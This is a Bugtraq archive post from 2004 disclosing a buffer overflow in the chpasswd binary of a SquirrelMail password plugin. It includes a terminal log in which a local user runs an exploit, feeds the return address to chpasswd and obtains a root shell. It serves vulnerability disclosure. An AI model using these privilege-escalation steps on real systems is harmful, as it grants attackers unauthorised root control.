Bugtraq mailing list archives
Squirrelmail Chpasswod bof
From: Matias Neiff <matias () neiff com ar>
Date: Sat, 17 Apr 2004 04:20:26 -0300
Hi all There is a boffer over flow in the chpasswd binary, distributed with the plugin. This allow to local's user to execute commands as a root. ---:::Prott:::--- root@orco:/mnt/hosting/hack/bof# su webmaster webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999 Using address: 0xbfffe325 bash-2.05b$ ./chpasswd $RET asdf asdf The new password is equal to old password. Choose another password. sh-2.05b# id uid=0(root) gid=3(sys) groups=500(webmaster) sh-2.05b# ---:::end:::--- Bye all
Current thread:
- Squirrelmail Chpasswod bof Matias Neiff (Apr 17)
- Re: Squirrelmail Chpasswod bof Jonathan Angliss (Apr 19)
- Re: Squirrelmail Chpasswod bof martin f krafft (Apr 19)
- <Possible follow-ups>
- Re: Squirrelmail Chpasswod bof Peter Geissler (Apr 19)
- Re: Squirrelmail Chpasswod bof rip (Apr 19)
- Re: Squirrelmail Chpasswod bof p dont think (Apr 27)
